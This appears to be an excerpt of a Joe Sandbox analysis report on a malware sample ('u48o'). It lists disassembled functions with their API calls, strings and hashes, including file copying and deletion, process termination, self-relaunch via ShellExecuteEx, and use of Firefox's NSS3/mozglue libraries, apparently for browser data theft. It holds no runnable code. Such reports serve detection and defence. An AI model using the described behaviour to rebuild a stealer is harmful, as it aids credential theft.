Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: a1a2b5cda2ea83c338a5724bc611e93d3d4c47d921f3d9b43572eda6639a5598
Instruction ID: 8793a3b54375dae3c952dfbfb850bf44119bdd82438a484e57eb604222725495
Opcode Fuzzy Hash: a1a2b5cda2ea83c338a5724bc611e93d3d4c47d921f3d9b43572eda6639a5598
Instruction Fuzzy Hash: 3F115AB2B01165ABDE01AAA6EC45EA6B768BF042697144221F90D87E01E732E434CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C3A2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C3A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C3A5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3A2CEC

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

PR_EnterMonitor.NSS3(?), ref: 6C3A2D02
PR_EnterMonitor.NSS3(?), ref: 6C3A2D1F
PR_ExitMonitor.NSS3(?), ref: 6C3A2D42
PR_ExitMonitor.NSS3(?), ref: 6C3A2D5B

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: aeafa54b844d2d9fda74643369b8d0143cca1d92b18e443df8d3a6a28b91a80d
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 4201C8B6910700ABE6309E66FC40BC7B7B5EF55318F044525E8AD86711D633F4268F93

Uniqueness

Uniqueness Score: -1.00%

Function 6C3A2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C3A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C3A5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3A2D9C

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

PR_EnterMonitor.NSS3(?), ref: 6C3A2DB2
PR_EnterMonitor.NSS3(?), ref: 6C3A2DCF
PR_ExitMonitor.NSS3(?), ref: 6C3A2DF2
PR_ExitMonitor.NSS3(?), ref: 6C3A2E0B

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 7908f4bdb9ed8d1613f53d2ffde4d48896e0c9c0c263ec9bcc760bf8d579d5f3
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: D601A5B6910600ABEA309E66FC01FC7B7B5EB51318F054535E89D86B11D633F4268A93

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34
F(t, xrefs: 00414EF1, 00414F00

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: F(t$%dx%d
API String ID: 2716131235-3934083006
Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6C42ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C42A6D8), ref: 6C42AE0D
free.MOZGLUE(?), ref: 6C42AE14
DeleteCriticalSection.KERNEL32(6C42A6D8), ref: 6C42AE36
free.MOZGLUE(?), ref: 6C42AE3D
free.MOZGLUE(00000000,00000000,?,?,6C42A6D8), ref: 6C42AE47

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 78896e2288b4a54b08b153f4b99fff6d4c6c3b76e12fed7310b783c2628b0b26
Instruction ID: a43b593190b4c8766f804a7882ea4a43d3a34a578443981a7c539835e34d7e18
Opcode Fuzzy Hash: 78896e2288b4a54b08b153f4b99fff6d4c6c3b76e12fed7310b783c2628b0b26
Instruction Fuzzy Hash: FBF096B5201A01A7CF10EFA9E809E677B78BF86B757140329E92A83A40D735E116C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 6C2A6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C2A6D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C2A6D20
database corruption, xrefs: 6C2A6D2A
%s at line %d of [%.10s], xrefs: 6C2A6D2F

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: dbbf861c68941bd6d4a2e92ebaf7f0e83414aa170a71b7475bd9105c4f762a1c
Instruction ID: b23a5b2d4dd0bea86b858e4bcbd325b25c909da1a4863fe6da621bf7c8025abf
Opcode Fuzzy Hash: dbbf861c68941bd6d4a2e92ebaf7f0e83414aa170a71b7475bd9105c4f762a1c
Instruction Fuzzy Hash: C421E234614B099BD710CE5AC881B5AB7E6BF84348F248528EC4A9BF51E371E94A8792

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6C3DCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C3DCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C3DCC7B), ref: 6C3DCD7A
Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCD8E
Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCDA5
Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C3DCCB5
memcpy.VCRUNTIME140(6C4714F4,6C4702AC,00000090), ref: 6C3DCCD3
memcpy.VCRUNTIME140(6C471588,6C4702AC,00000090), ref: 6C3DCD2B

Part of subcall function 6C2F9AC0: socket.WSOCK32(?,00000017,6C2F99BE), ref: 6C2F9AE6
Part of subcall function 6C2F9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C2F99BE), ref: 6C2F9AFC

Part of subcall function 6C300590: closesocket.WSOCK32(6C2F9A8F,?,?,6C2F9A8F,00000000), ref: 6C300597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C3DCCB0

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 88fe60332e7215e543c69b65bb8e3b6566b8760504158d809afcb169e8e1359c
Instruction ID: 083a4b738205678babde6efb94d00ffeea6add64f8b1943361546991d6194238
Opcode Fuzzy Hash: 88fe60332e7215e543c69b65bb8e3b6566b8760504158d809afcb169e8e1359c
Instruction Fuzzy Hash: 7C1154F2B102605EDB15FF699867F827BB8A346238F141129E50ECBB41E775D4148BF2

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 6C360420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C34C97F,?,?,?), ref: 6C3604BF
TlsGetValue.KERNEL32(00000000,?,6C34C97F,?,?,?), ref: 6C3604F4
EnterCriticalSection.KERNEL32(?,?,?,6C34C97F,?,?,?), ref: 6C36050D
PR_Unlock.NSS3(?,?,?,?,6C34C97F,?,?,?), ref: 6C360556

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: 2cb9f45775f897965f0b15414f677b73fa97f4c74a7ac99ce28ca6ba3109a30c
Instruction ID: 4fa5d1f0faf8c0763bd8ec65c58743a1b32a982a1d1a8b1c4131eb9916ca3fbb
Opcode Fuzzy Hash: 2cb9f45775f897965f0b15414f677b73fa97f4c74a7ac99ce28ca6ba3109a30c
Instruction Fuzzy Hash: 63417BB0A056568FDB04DF2AC481669BBF4FF84318F14852DD9998BB05E731E891CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6C316C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C316C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C316CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C316CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C438FE0), ref: 6C316CFE

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 3d5439529496c6f46b22348ace742eebc35478f34bf19a013ed42b6fe7d27e77
Instruction ID: 17adedb576fececa961186eb9a50262f226ee29c0fab442a302d581fdb829cd6
Opcode Fuzzy Hash: 3d5439529496c6f46b22348ace742eebc35478f34bf19a013ed42b6fe7d27e77
Instruction Fuzzy Hash: 723181B1A052169FDB08DFA5C891ABFBBF5EF89248B10442DD905D7B00EB319905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: 773fdb304f9d804e73498a05dead36b115f25edbb0eb5aae20829a328c0bfb2e
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: 77b0b68463d6fef5e6b200bc3673d24200d9c40290899e4313afa8eaf82be581
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6C3004D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C3004F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C30053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C300558
